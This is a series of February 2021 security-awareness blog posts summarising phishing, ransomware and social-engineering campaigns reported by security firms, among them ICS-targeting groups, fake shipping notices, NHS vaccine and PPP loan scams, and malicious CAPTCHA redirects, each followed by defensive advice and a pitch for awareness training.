26Feb

Phishing Targets Industrial Control Systems

February 26, 2021By 0 comment

Phishing continues to be a primary initial access vector in cyberattacks against industrial control systems, according to researchers at Dragos. Out of the fifteen threat groups tracked by the security firm, ten rely on spear phishing attachments to compromise their victims, and thirteen abuse valid accounts to maintain persistence.

STIBNITE, a threat actor that targets wind turbine companies in Azerbaijan, uses fake login pages and malware-laden documents to compromise its victims.

“STIBNITE gains initial access via credential theft websites spoofing Azerbaijan government organizations and phishing campaigns using variants of malicious Microsoft Office documents,” Dragos says. “STIBNITE also used information related to the global COVID-19 pandemic for malicious document themes.”

TALONITE, a threat group that focuses on the US electric sector, uses spear phishing to deliver malicious documents.

“TALONITE’s phishing campaigns utilize electric and power grid engineering-specific themes and concepts, indicating an intent to gain a foothold within energy sector entities,” the researchers write. “Such access could facilitate gathering host and identity information, collecting sensitive operational data, or mapping the enterprise environment to identify points of contact with ICS. The identified infrastructure and phishing emails spoofed the National Council of Examiners for Engineering and Surveying (NCEES), North American Electric Reliability Corporation (NERC), the American Society of Civil Engineers (ASCE), and Global Energy Certification (GEC).”

Dragos stresses that malicious cyber activity targeting industrial control systems is increasing, with four new ICS-targeting threat actors spotted in 2020.

“Data from our YIR report shows that this trend corresponds with a 3X rise in ICS-focused threats,” said Dragos’ CEO, Robert M. Lee. “The convergence of an increasingly ICS-aware and capable threat landscape with the trend towards more network connectivity means that the practical observations and lessons learned contained in our 2020 YIR report are timely as the community continues to work to provide safe and reliable operations

New-school security awareness training can give your organization an essential layer of defense by enabling your employees to thwart targeted phishing attacks.

READ MORE
25Feb

Bogus FedEx and DHL Phishbait

February 25, 2021By 0 comment

Researchers at Armorblox describe an ongoing phishing campaign that’s using phony FedEx and DHL shipping notifications as phishing lures.

“A few days ago, the Armorblox threat research team observed an email impersonating FedEx attempt to hit one of our customer environments,” the researchers write. “The email was titled ‘You have a new FedEx sent to you’ followed by the date the email was sent. The email contained some information about the document to make it seem legitimate, along with links to view the supposed document.”

The emails contained links to the Quip document hosting service, where the attackers had set up a landing page with a link to a spoofed Office 365 login page. The DHL phishing scam used a similar technique.

“The email sender name was ‘Dhl Express’ and title was ‘Your parcel has arrived’, including the victim’s email address at the end of the title,” Armorblox says. “The email informed victims that a parcel arrived for them at the post office, and that the parcel couldn’t be delivered due to incorrect delivery details. The email includes attached shipping documents that victims are guided to check if they want to receive their delivery.”

These emails contained an HTML attachment that opened what appeared to be a blurred-out spreadsheet behind an Adobe login box. The login overlay had the user’s email address pre-filled in the first box, so the researchers believe the attackers were trying to trick the user into entering their email password rather than their Adobe account credentials.

The researchers conclude that people should use a combination of training and technical defenses such as two-factor authentication to defend themselves against these attacks.

“Since we get so many emails from service providers, our brains have been trained to quickly execute on their requested actions,” they write. “It’s much easier said than done, but engage with these emails in a rational and methodical manner whenever possible. Subject the email to an eye test that includes inspecting the sender name, sender email address, language within the email, and any logical inconsistencies within the email (e.g. Why is the email sender name ‘Dhl Express’ instead of ‘DHL Express’, Why does this shipping details document have an HTML extension? etc.).”

What might users be trained to look for? Poor idiomatic control, for one thing. The logos and layouts are very nicely done, but the words are a bit clumsier: DHL and FedEx have better writers. New-school security awareness training can create a culture of security within your organization so your employees can recognize phishing and other types of social engineering attacks.

READ MORE
24Feb

Running Headfirst Into a Breach

February 24, 2021By 0 comment

The pandemic changed the fortunes of many organisations. Perhaps none so much as Zoom, which has found itself becoming a noun synonymous with any form of video call.

However, its meteoric rise has not been without some hiccups along the way. There have been many cases of people not securing their meetings, leading to many cases of ‘zoombombing’ in which unauthorised people join video calls with the intention of sharing lewd, obscene or otherwise distasteful content.

There was also the case of investors wanting to jump on the Zoom bandwagon who inadvertently purchased stock of Zoom Technologies, a small Chinese company which had nothing to do with Zoom, the video chat platform.

Errors and mistakes aside, criminals have also been quick to notice the trend and have been quick to capitalise by registering thousands of fake domains designed to impersonate Zoom and other video conference brands. They have also been using them to send out phishing links.

With the majority of office employees working remotely, receiving Zoom invites or even seeing reminders in their calendar for upcoming Zoom meetings has become a daily occurrence.

It is not just phishing via email that has taken off. People working from home usually have several communication channels they use to interact with colleagues, customers, partners and friends. These encompass everything from messaging apps to social media and everything in between.

Pulling on Emotions

Criminals are very good at crafting messages in a way that pulls on people’s emotions. This can be fear, greed, curiosity, urgency, helpfulness or any other emotion. One of the biggest reasons for this can be understood by Daniel Kahneman who stated in his book, “Thinking, Fast and Slow” that there are essentially two types of thinking the human brain undertakes.

System one is referred to as fast thinking and largely works automatically and effortlessly via shortcuts, impulses and intuition. It is fast, but also error prone. System two is also known as slow thinking. It takes time to analyse, reason, solve complex problems and requires people to exercise self-control. It is slow, but reliable.

A good criminal pulls on emotions because it is a surefire way to get people into system one thinking, where they will carry out an action before thinking about it.

Think about it. When was the last time you received a scam or phishing attack and the sender was polite and ended with, “please respond whenever is convenient, there’s no rush”?

It’s why an inflammatory Tweet or Facebook post receives so much attention and so many responses, even though we often know we should just ignore it. It just presses our emotional buttons and we need to say something.

So, it becomes difficult to reign people in — even the most security conscious people can be fooled by a WhatsApp message which pops up saying, “Why aren’t you in the meeting? We’re all waiting for you. Click here to join.”

Not a Theoretical Risk

The security industry has been guilty in the past of over-hyping issues. But social engineering threats are very real. If we look at the growth of ransomware over the years, it has become a huge criminal cash cow.

Most ransomware these days is delivered via phishing across multiple channels, hitting organisations across all industry verticals and of all sizes. Nearly a year ago, Travelex was hit by ransomware which resulted in the business being down for several weeks before they recovered. Unfortunately, its woes didn’t end there. With the pandemic hitting and many countries going into lockdown, the organisation didn’t get a chance to recover and went into administration later in the year.

Down under in Australia, the CEO of a hedge fund was tricked into clicking on a phishing email disguised as a Zoom invite. The click gave criminals access to the CEO’s email, which allowed them to send emails posing as the CEO authorising payments amounting to nearly $8m. And while the hedge fund was able to recover most of the money, the reputational damage was so severe that its main fund pulled out, forcing the hedge fund to shut down.

The fact of the matter is that social engineering attacks are only increasing and becoming the main thrust of cybercrime, which are having far greater impact on victim organisations.

Ways You Can Stay Safe

Staying safe against these attacks is increasingly difficult, not just from the increased sophistication of attacks, but the sheer volume of attack avenues that are available to criminals, ranging from email inboxes, social media accounts, chat apps, sms and phone calls.

  1. Security Awareness Training

    Security awareness training should be raised to all users from the most junior all the way to the most senior executives. The variety and impact of these attacks should be explained and mechanisms provided so that users can quickly and easily report any suspicious activity for the security team to investigate.

  2. Gain Visibility

    Security teams need to be able to obtain visibility into all of their organisation’s communication channels. For most organisations, too many channels are kept in the dark, so often by the time a breach is detected, it is too late.

  3. Real-Time Threat Detection

    All critical accounts, including marketing and executives, need to be monitored continuously for suspicious activity and messaging. In addition to scanning all files, attachments and links for malware, non-technical social engineering threats should also be sought out.

  4. Incident Response

    A layered response approach needs to be put in place so that any threats detected can be removed immediately.

READ MORE
23Feb

The First Documented Russian Hack in…1981?

February 23, 2021By 0 comment

I’m reading “Active Measures: The Secret History of Disinformation and Political Warfare” by Thomas Rid and wanted to share this story with you which was new to me! It’s warmly recommended, a great read.

In October 1981, in a highly embarrassing incident for the Kremlin, a large Soviet nuclear-armed submarine ran aground near Sweden’s Karlskrona Naval Base, violating Swedish Territorial waters.

To deflect some political heat, Russian intelligence launched an innovative active measures campaign that took advantage of a new semi-electronic messaging system called the Mailgram, an invention of Western Union.

All of a sudden, on November 8, 1981, a dozen Mailgrams started appearing across Washington, offering dirt on Swedish-American relations. They were sent to the Swedish Ambassador and several newspapers in the United States and Europe.

How was this hack possible?

A sender could phone in a message to Western Union, and they would transmit it electronically to a post office close to the recipient where the message would be printed out and delivered by mail.

Western Union did not independently confirm the recipient’s address or the telephone number to which the unauthenticated caller asked to bill the charges. “Obviously,” concluded the FBI, “the true senders of the Mailgrams were aware that they could have the charges billed to the addresses or telephone numbers of the alleged senders without verification. The setup was easy to exploit since the attackers spoofed false senders and had Western Union send the bill to the impersonated users!

My realization was that Russia has been at this for a very, very long time, and with the advent of the internet they have the ultimate tool to scale their active measures and cause massive international havoc.

READ MORE
22Feb

U.K. Phishing Attack Targets Those Seeking the COVID-19 Vaccine

February 22, 2021By 0 comment

This latest phishing scam impersonates the UK’s National Health Service, telling recipients that are eligible for the vaccine in order to collect valuable banking and credit card details.

I really despise these scammers. At a time when people are searching for a way to protect themselves, these lowlifes of the cybercriminal world prey on those in fear. This latest scam has recently hit the UK where unsuspecting victims were sent an official-looking email purporting to be from the UK government with a simple message – that the recipient has been selected for the vaccine.

Would-be victims who click the “Accept Invitation” link are taken to a legitimate-looking website that appears to be the NHS:

phishing-landing-page

Source: Bleeping Computer

Once victims again choose to accept the invitation, they are prompted to answer a series of questions that collect personal details including the victim’s name, their mother’s maiden name, address, and mobile number, as well as credit card and banking details.

While this scam feels like it’s targeting individuals, the very same scam is possible within your organization; all it takes is a little spin on the theming (e.g., make the email be from the HR department about a company-wide vaccination with a link to the rollout schedule that happens to attempt to collect Office 365 credentials) to be business-worthy.

Organizations need to take attacks that seem to target individuals over a corporation, as the shift in a campaign to steal corporate data only requires a few changes in how an attack like the one above is executed.

Putting users through Security Awareness Training is an effective way to help them protect themselves and the organization, regardless of how well-executed a phishing campaign is.

READ MORE
19Feb

Popular Car Company Becomes Next Target in $20 Million Dollar Ransomware Attack

February 19, 2021By 0 comment

In an unfortunate situation popular car company Kia Motors America recently made headlines of a possible ransomware attack and the company was demanded to pay $20 Million ransom from a cybercriminal gang in order to not leak stolen data.

It was reported by Bleeping Computer earlier this week that the car company suffered a major IT outage that affected all of their technology applications. A customer tweeted that they were told from a dealership that the outage is due to the ransomware attack.

The alleged ransomware group responsible for this attack was DoppelPaymer ransomware, a popular gang that steals unencrypted files before stealing the encrypted device. They also leak data on a site to further pressure the victim to pay the ransom. Below is a recent example of just that:

Source: Bleeping Computer

Kia Motors America released a statement with the following, “KMA is aware of IT outages involving internal, dealer and customer-facing systems, including UVO. We apologize for any inconvenience to our customers and are working to resolve the issue and restore normal business operations as quickly as possible.”

Make sure your organization is not the next victim of ransomware. New-school security awareness training can teach your users how to spot and report any suspicious activity.

READ MORE
18Feb

Bogus Bug Reports as Phishbait, Scams

February 18, 2021By 0 comment

Some bug bounty seekers are using extortionist or fear-mongering tactics in an effort to get paid for reporting trivial flaws, according to Chester Wisniewski at Sophos. He calls them “beg bounty” attempts. Wisniewski explains that, “‘Beg bounty’ queries run the gamut from honest, ethical disclosures that share all the needed information and hint that it might be nice if you were to send them a reward, to borderline extortion demanding payment without even providing enough information to determine the validity of the demand.”

For example, some of these individuals use automated scanners to identify websites that don’t have DMARC enabled, then send a copy-and-pasted notification to each website’s owner.

“They claim to have found a ‘vulnerability in your website’ and then go on to explain that you do not have a DMARC record for protection against email spoofing,” Wisniewski writes. “That is neither a vulnerability nor is it in your website. While publication of DMARC records can help prevent phishing attacks, it is not an easy policy to deploy, nor is it high on the list of security tasks for most organizations.”

While some of these people are probably well-meaning, others are clearly scammers seeking to frighten victims into paying. Even in the cases where real vulnerabilities were identified, the flaws were minor and not worthy of a bounty payout. Additionally, many of the targeted organizations didn’t have bug bounty programs set up in the first place. Wisniewski thinks small businesses are most at risk of falling for these tactics.

“There are reports that paying beg bounties leads to escalating demands for higher payments,” Wisniewski says. “One organization apparently said it started out at $500 and then, as further bugs were reported, the senders quickly demanded $5,000 and were more threatening.”

If you do have a bug bounty program, you’ll know about it. And if you don’t, let your people know that, too, so they don’t fall victim to this…what? Grey hat scam? Not all scams come in black and white. New-school security awareness training can help your employees remain calm and avoid falling victim to scare tactics and other social engineering techniques.

READ MORE
17Feb

Caught by a CAPTCHA?

February 17, 2021By 0 comment

Be aware of being involved in malicious CAPTCHA solving.

I do not know anyone who loves CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart). These are little online tests that supposedly tease out whether the action being performed is being done by a human or some automated bot program or script. They are needed because miscreants across the Internet would otherwise abuse the involved services to create bogus accounts used to hack others or simply abuse the system in some other way. CAPTCHAs are an unfortunate, but necessary part of life (at least right now). We are forced to interact with them when we are newly registering on websites or performing a potentially risky action.

CAPTCHA Examples

There are many different types of CAPTCHAs, ranging from extremely easy to solve to ones that require more effort and are more prone to human error. In their easiest form, they are simply a box (see example below) that we are told click.

im not a robot example

And all we do is click the box to prove we are not a bot, resulting in the image we all see below.

im not a robot example

Some of the CAPTCHA tests ask us to type out characters we see that have been exaggerated and changed in some way that humans can supposedly still make them out, but an automated optical character recognition (OCR) program could not. See example below.

unlike impossible example

I am sure many of us really hate those sorts of tests because it can be tough for anyone to figure out what the characters or words are at times. I have even hit the ‘Send a new word’ button before and had to cycle through a few new offers before I could find one that I could figure out 100%.

Some CAPTCHAs (like the one below), used by Tik Tok, simply ask you to pick out two similar objects.

captcha example

The most complicated ones are the ones that ask you to “Click on all the squares…” that contain traffic lights, cars, traffic signs, or some other supposedly common image (like the image below).

google captcha example

The problem with these types is that many times, the blocks will contain a very tiny piece of the required object, often looking almost accidental or microscopic, and you’re not sure if it should be selected or not. Forget frustrating bots, CAPTCHAs frustrate humans.

If you want to a seriously funny video that pokes fun at the trials and tribulations of CAPTCHAs, watch this video here.

CAPTCHA Tricks

The reason why CAPTCHAs are not going away is because they work. They do significantly defeat automated bots and scripts. There have been many attempts by hackers to automate answering CAPTCHAs in bulk, including using machine learning, OCR, and artificial intelligence-like tools. None of them work as good as a human.

So, hackers simply outsourced CAPTCHA solving to human beings. Hackers still use bots and automation to register on websites and create accounts, but the whole process is automated. They do not use the involved website’s normal code as offered up to a normal user surfing the web. Instead, they create malicious programs that interface with the website or its application programming interface (API), which removes all the human-readable text and simply, quickly fills in the required account registration information. And when the CAPTCHA component is shown, the bot sends just the CAPTCHA part to real humans paid by the hackers to solve one CAPTCHA puzzle after the next. Somewhere in the world are teams of sweat shop workers who are working tirelessly to solve CAPTCHAs, one after the other, as fast as they can. The sweat shop workers make only a tiny amount per solved CAPTCHA, but if they can solve hundreds to thousands of them in a day, they can make a few dollars or a decent living for their skill set in their part of the world. I know of skilled IT workers who bought their less skilled parents a computer, set it up in their house, and their mom and dad solve CAPTCHAs to supplement their normal income. It’s not ethical, but in many parts of the world, it’s the way a part of the population makes their money.

Websites using CAPTCHAs understand that hackers will hire teams of sweat shop workers to solve CAPTCHAs, so they fight back in many ways, including tracking the originating IP addresses involved with solving the CAPTCHA. If too many CAPTCHAs are solved from one IP address, they cut that IP address off or no longer allow it to solve future CAPTCHAs. Hackers responded by changing up used IP addresses, so they do not get “burned”, but it significantly slowed down illegal CAPTCHA solving.

Frustrated hackers responded by sending CAPTCHAs to be solved to millions of innocent people across the Internet, each with their own individual IP addresses. The criminals compromise innocent websites around the Internet and instead of inserting a malicious JavaScript that tries to install malware or phish login credentials, it sends a CAPTCHA image, which it hopes the hapless user will fill out and respond to.

It was just such an attempt that I saw today that inspired this blog. I went to a popular news website that I visit every day, several times a day, and all of a sudden on that website, I saw a CAPTCHA pop-up that it told me I had to solve (just one of the simple click-here types). I shook my head, and thought, “What’s This?” and was just about to click it when I realized that it was probably a malicious CAPTCHA redirect. I examined the proposed CAPTCHA. It looked as normal as any CAPTCHA I had ever seen before. I would have taken a picture for this column, but it looked like any other CAPTCHA I had ever seen before…no clues of its maliciousness. It was just a CAPTCHA on a website that does not require registration and never before had asked me to fill out a CAPTCHA.

I hit the refresh button and the malicious JavaScript CAPTCHA disappeared and the regular website came up. I downloaded all the website code to see if I could figure out where the malicious JavaScript was, but my browser refresh had bought up a new instance of the website without the malicious CAPTCHA. My “evidence” was gone. More importantly, the website I was on was not asking for me to complete a CAPTCHA, proof that the one shown to me was a malicious redirect. I notified the website’s developers about the issue, but haven’t even received an automated reply.

I am not sure where the malicious CAPTCHA redirect came from. The average popular website has 50 to 150 different elements that make up the website page we see and most of those elements are from third-party sites and services, and not from the domain name you went to. Maybe the malicious JavaScript came through on a banner ad. Maybe it came through on a borrowed JavaScript element. Somewhere on that web page was a compromised element that ended up, at least for that one instance, displaying a malicious CAPTCHA redirect.

Why You Should Care About Malicious CAPTCHAs

Now in the grand scheme of things, malicious CAPTCHA redirects are very low risk to the end user. As far as I know, they cannot be used to silently install malware on a user’s device or to redirect them to a malicious web page. In that way, they are a bit like adware malware – more of a pest than outright dangerous.

But like adware, malicious CAPTCHAs, can be a stand-in for how something far more malicious is presented to us or our end users, that if they don’t realize it and click, can lead to something far more malicious. The effort needed for adware and CAPTCHA redirects to get presented to an end user is the same root exploits as the much more dangerous things that could otherwise be presented. Presence of adware on a computer means a much more malicious backdoor trojan or ransomware program could use the same hole or trick. If a user ONLY has adware, they are just lucky. It could have been far worse. And if they do not figure out that adware got on the computer, worse things could easily happen next time. Luck runs out.

The same is true with malicious CAPTCHA redirects. At the very least, none of us want to be involved in solving CAPTCHA puzzles for hackers so they can automate malicious account creation and do worldwide malicious things. But it also a teachable moment for end users. All users should be aware that potentially dangerous elements could be presented to them that they need to evaluate and handle properly, even if they go to what they think is a “safe” web page.

Educate your end users to be aware of possible dangerous website elements that get inserted into their favorite, legitimate websites; and how to recognize and respond. New-school security awareness training is all about making people aware of what can be done, what it looks like, and how to treat issues. Let your end users know about potential malicious CAPTCHA redirects, because if they can recognize and avoid those, they are going to be ahead of the game with the more malicious web elements.

READ MORE
16Feb

Phishing and Impersonated Brands

February 16, 2021By 0 comment

Microsoft is still the most impersonated brand for phishing campaigns, according to researchers at Vade Secure. The security firm spotted 30,621 unique Microsoft-related phishing URLs in 2020. The researchers note that “[a] single unique phishing URL could be used in hundreds or even thousands of phishing emails.” Facebook was the second most impersonated, with 14,876 unique phishing URLs. PayPal came in third, followed by Chase and eBay.

“COVID-19 colored everything in 2020, so it’s not surprising that cloud came out on top,” the researchers write. “As the working world switched to remote, the need for cloud-based solutions skyrocketed. Microsoft Teams users increased from 44 million in March 2020 to 75 million in April 2020. Meanwhile, Facebook, Google, and Netflix saw big financial gains during COVID-19, and each is in the top 20.”

E-commerce phishing has also been on the rise due to the pandemic, and some new brands have made it to the top ten list.

“New to the Phishers’ Favorites list, Rakuten, a Japanese e-commerce company, made its first appearance on the list, coming in at #6,” the researchers write. “Rakuten’s rise is thanks to a large spike in phishing activity in Q3 2020, when Vade Secure detected a 485 percent increase in Rakuten phishing URLs.”

The researchers also observed a year-over-year increase in phishing emails laden with the Emotet banking Trojan.

“Phishing emails weaponized with malware also featured prominently in 2020,” Vade Secure says. “Emotet, which had gone silent in early 2020, returned briefly in the spring and came roaring back in the fall. A wave of Emotet malware emails hit Microsoft users in September, with a single-day high of 1,799 phishing URLs and 13,617 for the quarter, a 44 percent increase from Q2.”

Trends in phishing lures change over time, but the underlying hallmarks of social engineering remain the same. New-school security awareness training can help your employees recognize phishing emails and other social engineering attacks.

READ MORE
15Feb

New Phishing Scam Uses Fake PPP Loans to Trick Victims into Giving Up Personal Information

February 15, 2021By 0 comment

Taking advantage of people’s need for financial assistance, these scammers pose as a bank offering “forgivable business loans to individuals impacted by the pandemic.”

Nothing says low life more than someone who purposely targets those who are already down and out. Those responsible for a new scam identified by the security researchers at Abnormal Security are the lowest of the low – running a scam essentially promising free money to those that are in need.

In this scam, thousands of potential victims were sent an email impersonating an SBA Lender “World Trade Finance” informing the recipient that the Paycheck Protection Program has been extended and they are now taking applications for new forgivable loans.

Those interested click a link that takes them to a legitimate Office 365 form that appears legitimate:

k7tpHZAJPR3XoIV91Eev2PHG6V9QRCWbJczMzTipqnbBTQxQrcyDaiyXS-oX9VwvEI3oi4sj2M6yor2crx4fOK0hXQaEniMha0hppia5CuGXovm43S1TAf6kPX8CyCaYJLyt3s8-

Victims are asked for every piece of personal information including name, birthdate, and social security number – along with other business details to make the form seem legitimate.

There were some telltale signs that this was a scam to begin with:

  • The email is sent to ‘payments@sba.pppgov.com’, a domain obviously not associated with the government.
  • It appears the actual recipient must have been blind cc’d
  • The link goes to an Office 365 form and not something embedded in the business’ actual website
  • While there is a ‘World Trade Finance’ that is an SBA lender, a quick look up of the lender and a comparison to the address provided in the email would result in a mismatch.

Users can easily avoid becoming the victim of such scams once they look at email and web content through a scrutinizing lens. This only comes through continual Security Awareness Training that educates users on what to look for, the types of scams that occur, and how to keep a vigilant mindset while working.

READ MORE